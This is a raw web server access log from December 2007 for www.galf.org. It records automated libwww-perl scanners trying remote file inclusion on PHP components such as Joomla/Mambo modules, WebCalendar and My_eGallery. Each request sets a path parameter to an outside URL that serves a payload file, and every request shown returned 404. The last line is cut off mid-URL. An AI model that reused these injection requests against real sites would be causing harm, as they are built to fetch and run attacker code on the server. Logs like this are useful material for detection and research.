67.18.109.250 - - [09/Dec/2007:19:06:27 -0800] "GET /Webcalendar/ws/login.php?noSet=0&includedir=http://aspato-go.com/cartt/images/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.91.249.176 - - [09/Dec/2007:19:07:05 -0800] "GET /logs/access_070702.log/modules/My_eGallery/index.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.237.123.242 - - [09/Dec/2007:19:07:15 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.237.123.242 - - [09/Dec/2007:19:07:15 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.114.222.188 - - [09/Dec/2007:19:07:49 -0800] "GET /logs//index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.114.222.188 - - [09/Dec/2007:19:07:50 -0800] "GET //index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:19:07:56 -0800] "GET /logs/access_071014.log/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
202.60.70.58 - - [09/Dec/2007:19:07:57 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:19:07:58 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:19:08:53 -0800] "GET /logs/access_070625.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.101.244.6 - - [09/Dec/2007:19:08:53 -0800] "GET /logs/Webcalendar/ws/login.php?noSet=0&includedir=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.101.244.7 - - [09/Dec/2007:19:08:54 -0800] "GET /Webcalendar/ws/login.php?noSet=0&includedir=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:19:08:59 -0800] "GET /logs/access_070625.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:19:09:00 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:19:09:00 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.70.58 - - [09/Dec/2007:19:10:23 -0800] "GET /logs/access_070917.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
89.108.67.103 - - [09/Dec/2007:19:11:26 -0800] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.103 - - [09/Dec/2007:19:11:27 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.103 - - [09/Dec/2007:19:11:27 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.103.35.18 - - [09/Dec/2007:19:11:34 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.103.35.18 - - [09/Dec/2007:19:11:34 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.103 - - [09/Dec/2007:19:12:06 -0800] "GET /logs/access_071014.log//components/com_extended_registration/registration_d